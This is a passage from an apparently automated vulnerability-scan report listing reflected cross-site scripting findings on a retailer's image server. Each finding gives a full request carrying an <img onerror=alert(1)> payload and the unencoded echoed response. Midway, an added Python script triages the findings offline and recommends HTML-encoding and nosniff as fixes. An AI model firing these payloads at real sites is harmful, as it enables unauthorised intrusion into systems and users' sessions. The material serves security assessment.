This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_5819574c<img%20src%3da%20onerror%3dalert(1)>fefecf03ff0?$img_gif$&hei=20&wid=55&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_5819574c<img src=a onerror=alert(1)>fefecf03ff0

3.71. http://images3.pacsun.com/is/image/pacsun/detailLogo_651 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_651

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7b7b8<img%20src%3da%20onerror%3dalert(1)>c0ef5bf553c was submitted in the REST URL parameter 4. This input was echoed as 7b7b8<img src=a onerror=alert(1)>c0ef5bf553c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_6517b7b8<img%20src%3da%20onerror%3dalert(1)>c0ef5bf553c?$img_gif$&hei=20&wid=83&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:47 GMT
Connection: close

Unable to find /pacsun/detailLogo_6517b7b8<img src=a onerror=alert(1)>c0ef5bf553c

3.72. http://images3.pacsun.com/is/image/pacsun/detailLogo_711 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_711

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf073<img%20src%3da%20onerror%3dalert(1)>349e06f6aa1 was submitted in the REST URL parameter 4. This input was echoed as cf073<img src=a onerror=alert(1)>349e06f6aa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_711cf073<img%20src%3da%20onerror%3dalert(1)>349e06f6aa1?$img_gif$&hei=20&wid=47&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:35 GMT
Connection: close

Unable to find /pacsun/detailLogo_711cf073<img src=a onerror=alert(1)>349e06f6aa1

3.73. http://images3.pacsun.com/is/image/pacsun/detailLogo_821 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_821

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d3224<img%20src%3da%20onerror%3dalert(1)>cbeb6a32bd3 was submitted in the REST URL parameter 4. This input was echoed as d3224<img src=a onerror=alert(1)>cbeb6a32bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_821d3224<img%20src%3da%20onerror%3dalert(1)>cbeb6a32bd3?$img_gif$&hei=20&wid=62&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_821d3224<img src=a onerror=alert(1)>cbeb6a32bd3

3.74. http://images3.pacsun.com/is/image/pacsun/detailLogo_841 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_841

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57e45<img%20src%3da%20onerror%3dalert(1)>886d240528f was submitted in the REST URL parameter 4. This input was echoed as 57e45<img src=a onerror=alert(1)>886d240528f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_84157e45<img%20src%3da%20onerror%3dalert(1)>886d240528f?$img_gif$&hei=20&wid=88&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:34 GMT
Connection: close

Unable to find /pacsun/detailLogo_84157e45<img src=a onerror=alert(1)>886d240528f

3.75. http://images3.pacsun.com/is/image/pacsun/detailLogo_851 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_851

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 49714<img%20src%3da%20onerror%3dalert(1)>47a258f6aab was submitted in the REST URL parameter 4. This input was echoed as 49714<img src=a onerror=alert(1)>47a258f6aab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_85149714<img%20src%3da%20onerror%3dalert(1)>47a258f6aab?$img_gif$&hei=20&wid=83&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:28 GMT
Connection: close

Unable to find /pacsun/detailLogo_85149714<img src=a onerror=alert(1)>47a258f6aab

3.76. http://images3.pacsun.com/is/image/pacsun/detailLogo_882 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_882

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25fa5<img%20src%3da%20onerror%3dalert(1)>0605ce3fb60 was submitted in the REST URL parameter 4. This input was echoed as 25fa5<img src=a onerror=alert(1)>0605ce3fb60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_88225fa5<img%20src%3da%20onerror%3dalert(1)>0605ce3fb60?$img_gif$&hei=20&wid=40&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:37 GMT
Connection: close

Unable to find /pacsun/detailLogo_88225fa5<img src=a onerror=alert(1)>0605ce3fb60

3.77. http://images3.pacsun.com/is/image/pacsun/detailLogo_891 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_891

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f122e<img%20src%3da%20onerror%3dalert(1)>8fe677fa087 was submitted in the REST URL parameter 4. This input was echoed as f122e<img src=a onerror=alert(1)>8fe677fa087 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_891f122e<img%20src%3da%20onerror%3dalert(1)>8fe677fa087?$img_gif$&hei=20&wid=17&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_891f122e<img src=a onerror=alert(1)>8fe677fa087

3.78. http://images3.pacsun.com/is/image/pacsun/detailLogo_911 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_911

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cd2c<img%20src%3da%20onerror%3dalert(1)>1f8bc0e79cf was submitted in the REST URL parameter 4. This input was echoed as 8cd2c<img src=a onerror=alert(1)>1f8bc0e79cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_9118cd2c<img%20src%3da%20onerror%3dalert(1)>1f8bc0e79cf?$img_gif$&hei=20&wid=46&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:33 GMT
Connection: close

Unable to find /pacsun/detailLogo_9118cd2c<img src=a onerror=alert(1)>1f8bc0e79cf

3.79. http://images3.pacsun.com/is/image/pacsun/detailLogo_921 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_921

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34b5d<img%20src%3da%20onerror%3dalert(1)>d93ebbf56 was submitted in the REST URL parameter 4. This input was echoed as 34b5d<img src=a onerror=alert(1)>d93ebbf56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_92134b5d<img%20src%3da%20onerror%3dalert(1)>d93ebbf56?$img_gif$&hei=20&wid=83&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 79
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:40 GMT
Connection: close

Unable to find /pacsun/detailLogo_92134b5d<img src=a onerror=alert(1)>d93ebbf56

3.80. http://images3.pacsun.com/is/image/pacsun/detailLogo_A05 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_A05

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 560bb<img%20src%3da%20onerror%3dalert(1)>62ff753761b was submitted in the REST URL parameter 4. This input was echoed as 560bb<img src=a onerror=alert(1)>62ff753761b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_A05560bb<img%20src%3da%20onerror%3dalert(1)>62ff753761b?$img_gif$&hei=20&wid=20&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:28 GMT
Connection: close

Unable to find /pacsun/detailLogo_A05560bb<img src=a onerror=alert(1)>62ff753761b

3.81. http://images3.pacsun.com/is/image/pacsun/detailLogo_B07 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_B07

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 44f39<img%20src%3da%20onerror%3dalert(1)>bcadb3209b2 was submitted in the REST URL parameter 4. This input was echoed as 44f39<img src=a onerror=alert(1)>bcadb3209b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_B0744f39<img%20src%3da%20onerror%3dalert(1)>bcadb3209b2?$img_gif$&hei=20&wid=22&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:37 GMT
Connection: close

Unable to find /pacsun/detailLogo_B0744f39<img src=a onerror=alert(1)>bcadb3209b2
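
Every finding in this series has the same shape: a marker-wrapped <img onerror> payload in the fourth path segment comes back unencoded in a 403 body served as text/plain. The following Python script is an added example, not part of the scanner output, that re-checks such a finding offline from a raw response: it confirms the unencoded reflection the scanner reports, then inspects Content-Type and X-Content-Type-Options, which decide whether a browser would ever parse the reflection as HTML. SAMPLE_TEXT_PLAIN is constructed from the headers and body recorded under 3.81 above (Date header omitted); the text/html and HTML-escaped variants are hypothetical, built only to show how the verdict changes.

```python
"""Offline triage of a reflected-payload finding from a raw HTTP response.

Added example, not part of the scanner report. SAMPLE_TEXT_PLAIN is
constructed from the 403 response recorded under finding 3.81; the
text/html and HTML-escaped variants are hypothetical, built here only
to show how the verdict changes.
"""
from urllib.parse import unquote

# Payload exactly as it appears, URL-encoded, in the request line of 3.81.
PAYLOAD_ENCODED = "44f39<img%20src%3da%20onerror%3dalert(1)>bcadb3209b2"

# Constructed to match the recorded response (Date header omitted).
SAMPLE_TEXT_PLAIN = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Pragma: no-cache\r\n"
    "Content-Type: text/plain\r\n"
    "Content-Length: 81\r\n"
    "Cache-Control: max-age=3600\r\n"
    "Connection: close\r\n"
    "\r\n"
    "Unable to find /pacsun/detailLogo_B0744f39<img src=a onerror=alert(1)>bcadb3209b2"
)

# Hypothetical: same body served as HTML, which is what the scanner text implies.
SAMPLE_TEXT_HTML = SAMPLE_TEXT_PLAIN.replace("Content-Type: text/plain",
                                             "Content-Type: text/html")

# Hypothetical: the body a fixed server would send, with the path HTML-escaped.
SAMPLE_ESCAPED = SAMPLE_TEXT_HTML.replace("<img src=a onerror=alert(1)>",
                                          "&lt;img src=a onerror=alert(1)&gt;")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).

    Header names are lower-cased so lookups are case-insensitive; a
    repeated header keeps its last value, which is enough for triage."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def reflection_kind(body, payload_encoded):
    """'raw' if the URL-decoded payload is echoed verbatim, 'escaped' if it
    is echoed with its angle brackets entity-encoded, None otherwise."""
    decoded = unquote(payload_encoded)
    if decoded in body:
        return "raw"
    if decoded.replace("<", "&lt;").replace(">", "&gt;") in body:
        return "escaped"
    return None


def triage(raw, payload_encoded):
    """Classify a finding as 'confirmed', 'unconfirmed' or 'none'.

    A raw reflection is necessary but not sufficient: the browser also has
    to parse the response as HTML. It does so for text/html; for other
    types only legacy content sniffing could get there, and
    X-Content-Type-Options: nosniff rules that out."""
    status, headers, body = parse_response(raw)
    kind = reflection_kind(body, payload_encoded)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    if kind != "raw":
        verdict = "none"
    elif ctype == "text/html":
        verdict = "confirmed"
    elif nosniff:
        # Raw reflection, but the browser is told not to sniff: dead end.
        verdict = "none"
    else:
        # Raw reflection in a non-HTML type without nosniff. Current browsers
        # do not render text/plain as HTML, so this stays unconfirmed until
        # checked in the clients the target actually supports.
        verdict = "unconfirmed"
    return {"status": status, "reflection": kind, "content_type": ctype,
            "nosniff": nosniff, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in (("recorded text/plain", SAMPLE_TEXT_PLAIN),
                          ("hypothetical text/html", SAMPLE_TEXT_HTML),
                          ("hypothetical escaped", SAMPLE_ESCAPED)):
        print(label, triage(sample, PAYLOAD_ENCODED))
```

Run against the recorded response the script reports a raw reflection but an "unconfirmed" verdict, which is the honest state of findings 3.81 through 3.99 as captured here. The server-side fix is the same regardless of verdict: HTML-encode the requested path before echoing it in the error message, serve the error with an explicit Content-Type, and add X-Content-Type-Options: nosniff so that sniffing clients cannot turn a text/plain body into markup.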

3.82. http://images3.pacsun.com/is/image/pacsun/detailLogo_C07 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_C07

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 71f65<img%20src%3da%20onerror%3dalert(1)>c40a9d0d17e was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 71f65<img src=a onerror=alert(1)>c40a9d0d17e in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_C0771f65<img%20src%3da%20onerror%3dalert(1)>c40a9d0d17e?$img_gif$&hei=20&wid=19&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:34 GMT
Connection: close

Unable to find /pacsun/detailLogo_C0771f65<img src=a onerror=alert(1)>c40a9d0d17e

3.83. http://images3.pacsun.com/is/image/pacsun/detailLogo_E01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_E01

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 94385<img%20src%3da%20onerror%3dalert(1)>e4589bd16b0 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 94385<img src=a onerror=alert(1)>e4589bd16b0 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_E0194385<img%20src%3da%20onerror%3dalert(1)>e4589bd16b0?$img_gif$&hei=20&wid=56&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
